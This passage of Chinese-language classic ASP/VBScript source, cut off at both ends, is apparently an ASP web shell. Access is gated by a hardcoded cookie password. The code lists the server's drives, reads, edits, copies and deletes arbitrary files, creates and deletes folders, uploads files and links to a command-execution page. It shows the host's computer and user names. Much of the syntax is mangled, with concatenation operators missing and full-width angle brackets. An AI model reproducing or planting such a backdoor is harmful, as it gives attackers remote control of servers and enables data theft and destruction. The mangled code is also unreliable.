
alert"您没有输入文件名！"

end If

end sub

＜/script＞

＜body＞

＜table border="1" width="100%" cellpadding="0" height="81" bordercolorlight="#000000"

bordercolordark="#FFFFFF" cellspacing="0"＞

＜tr＞

＜td width="755" bgcolor="#000080" colspan="2" height="23"＞＜p align="center"＞＜font size="3"

color="#FFFFFF"＞＜%=httpt%＞＜/font＞＜/td＞

＜/tr＞

＜tr＞

＜td width="751" bgcolor="#C0C0C0" colspan="2"＞※换盘：＜span

style="background-color: rgb(255,255,255);color:rgb(255,0,0)"＞＜%

For Each thing in oFileSys.Drives

Response.write "＜font face=Wingdings＞:＜/font＞＜a href='" rseb "?q=list.asppath="thing.DriveLetter":attrib=true'＞"thing.DriveLetter":＜/a＞"

NEXT

%＞ ＜/span＞ 地址：

＜%= "\\" oScriptNet.ComputerName "\" oScriptNet.UserName %＞＜/td＞

＜/tr＞

＜tr＞

＜td width="751" bgcolor="#C0C0C0" colspan="2"＞※＜%

if Request("attrib")="true" then

response.write "＜a href='" rseb "?q=list.asp'＞切到相对路径＜/a＞"

else

response.write "＜a href='" rseb "?attrib=trueq=list.asp'＞切到绝对路径＜/a＞"

end if

%＞ ※绝对:＜span

style="background-color: rgb(255,255,255)"＞＜%=cpath%＞＜/span＞＜/td＞

＜/tr＞

＜tr＞

＜td width="751" bgcolor="#C0C0C0" colspan="2"＞※当前＜font color="#FF8000"＞＜font face=Wingdings＞1＜/font＞＜/font＞:＜span style="background-color: rgb(255,255,255)"＞＜%=lpath%＞＜/span＞ ＜/td＞

＜/tr＞＜form name="form1" method="post" action="＜%=rseb%＞?q=upfile.asp" target="_blank" enctype="multipart/form-data"＞

＜tr＞＜td bgcolor="#C0C0C0" colspan="2" style="height: 20px"＞

编辑|

＜input class="564c-856e-0cb1-2e5e tx1" type="text" name="filename" size="20"＞

＜input class="856e-0cb1-2e5e-9f0b tx1" type="button" value="建文" onclick="crfile(form1.filename.value)"＞

＜input class="0cb1-2e5e-9f0b-1c88 tx1" type="button" value="建目" onclick="crdir(form1.filename.value)"＞

＜input type="file" name="file1" class="2e5e-9f0b-1c88-6e27 tx1" style="width:100" value=""＞

＜input type="text" name="filepath" class="1bee-458f-7790-a466 tx1" style="width:100" value="＜%=cpath%＞"＞

＜input type="hidden" name="act" value="upload"＞

＜input type="hidden" name="upcount" class="458f-7790-a466-f49f tx" value="1"＞

＜input class="7790-a466-f49f-d178 tx1" type="submit" value="上传"＞

＜input class="a466-f49f-d178-1f65 tx1" type="button" onclick="window.open('＜%=rseb%＞?q=cmd.asp','_blank')" value="命令"＞

＜input class="f49f-d178-1f65-9174 tx1" type="button" onclick="window.open('＜%=rseb%＞?q=test.asp','_blank')" value="配置"＞

＜input class="d178-1f65-9174-8752 tx1" type="button" onclick="window.open('＜%=rseb%＞?q=p.asp','_blank')" value="nfso"＞

＜/td＞

＜/td＞

＜/tr＞＜/form＞

＜tr＞

＜td width="169" valign="top" bgcolor="#C8E3FF"＞＜%Call GetFolder()%＞

＜/td＞

＜td width="582" valign="top" bgcolor="#FFefdf"＞＜%Call GetFile()%＞

＜/td＞

＜/tr＞

＜/table＞

＜%else

response.write "Password Error!"

response.write "＜a href='" rseb "?q=" rseb "'＞【返 回】＜/a＞"

end if

＜/body＞

＜/html＞

＜%case "edit.asp"%＞

＜html＞

＜head＞

＜meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80"＞

＜title＞编辑源代码＜/title＞

＜style＞

table{ font-family: 宋体; font-size: 12pt }

a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }

a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline }

a:visited{ color: rgb(128,0,0) }

＜/style＞

＜/head＞

＜body＞

＜% '读文件

if Request.Cookies("password")="7758521" then

if request("op")="del" then

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set thisfile = oFileSys.GetFile(whichfile)

thisfile.Delete True

Response.write "＜script＞alert('删除成功！要刷新才能看到效果');window.close();＜/script＞"

else

if request("op")="copy" then

if Request("attrib")="true" then

whichfile=Request("path")

dsfile=Request("dpath")

else

whichfile=server.mappath(Request("path"))

dsfile=Server.MapPath(Request("dpath"))

end if

Set thisfile = oFileSys.GetFile(whichfile)

thisfile.copy dsfile

＜script language=vbscript＞

msgbox "源文件：＜%=whichfile%＞" vbcrlf "目的文件:＜%=dsfile%＞" vbcrlf "复制成功！要刷新才能看到效果!"

window.close()

＜/script＞

else

if request.form("text")="" then

if Request("creat")＜＞"yes" then

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set thisfile = oFileSys.OpenTextFile(whichfile, 1, False)

counter=0

thisline=thisfile.readall

thisfile.Close

set fs=nothing

end if

＜form method="POST" action="＜%=rseb%＞?q=edit.asp"＞

＜input type="hidden" name="attrib" value="＜%=Request("attrib")%＞"＞＜table border="0"

width="700" cellpadding="0"＞

＜tr＞

＜td width="100%" bgcolor="#FFDBCA"＞＜div align="center"＞＜center＞＜p＞＜%=httpt%＞＜/td＞

＜/tr＞

＜tr align="center"＞

＜td width="100%" bgcolor="#FFDBCA"＞文件名：＜input type="text" name="path" size="45"

value="＜%=Request("path")%＞ "＞直接更改文件名，相当于“另存为”＜/td＞

＜/tr＞

＜tr align="center"＞

＜td width="100%" bgcolor="#FFDBCA"＞＜textarea rows="25" name="text" cols="90"＞＜%=thisline%＞＜/textarea＞＜/td＞

＜/tr＞

＜tr align="center"＞

＜td width="100%" bgcolor="#FFDBCA"＞＜div align="center"＞＜center＞＜p＞＜input type="submit"

value="提交" name="B1"＞＜input type="reset" value="复原" name="B2"＞＜/td＞

＜/tr＞

＜/table＞

＜/form＞

＜%else

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set outfile=oFileSys.CreateTextFile(whichfile)

outfile.WriteLine Request("text")

outfile.close

set fs=nothing

Response.write "＜script＞alert('修改成功！要刷新才能看到效果');window.close();＜/script＞"

end if

end if

end if

else

response.write "Password Error!"

response.write "＜a href='" rseb "?q=" rseb "'＞【返 回】＜/a＞"

end if

＜/body＞

＜/html＞

＜%case "edir.asp"%＞

＜html＞

＜head＞

＜meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80"＞

＜title＞目录操作＜/title＞

＜style＞

table{ font-family: 宋体; font-size: 12pt }

a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }

a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline }

a:visited{ color: rgb(128,0,0) }

＜/style＞

＜/head＞

＜body＞

＜% '读文件

if Request.Cookies("password")="7758521" then

if request("op")="del" then

if Request("attrib")="true" then

whichdir=Request("path")

else

whichdir=server.mappath(Request("path"))

end if

oFileSys.DeleteFolder whichdir,True

Response.write "＜script＞alert('删除的目录为:" whichdir "删除成功！要刷新才能看到效果');window.close();＜/script＞"

else

if request("op")="creat" then

if Request("attrib")="true" then

whichdir=Request("path")

else

whichdir=server.mappath(Request("path"))

end if

oFileSys.CreateFolder whichdir

Response.write "＜script＞alert('建立的目录为:" whichdir "建立成功！要刷新才能看到效果');window.close();＜/script＞"

end if

end if

else

response.write "Password Error!"

response.write "＜a href='" rseb "?q=" rseb "'＞【返 回】＜/a＞"

end if

＜/body＞

＜/html＞

case "upfile.asp"

if Request.Cookies("password")="7758521" then

set upload=new upload_5xSoft

if upload.form("filepath")="" then

HtmEnd "请输入要上传至的目录!"

set upload=nothing

response.end

else

formPath=upload.form("filepath")

if right(formPath,1)＜＞"/" then formPath=formPath"/"

end if

iCount=0

for each formName in upload.objForm

set file=upload.file(formName)

if file.FileSize＞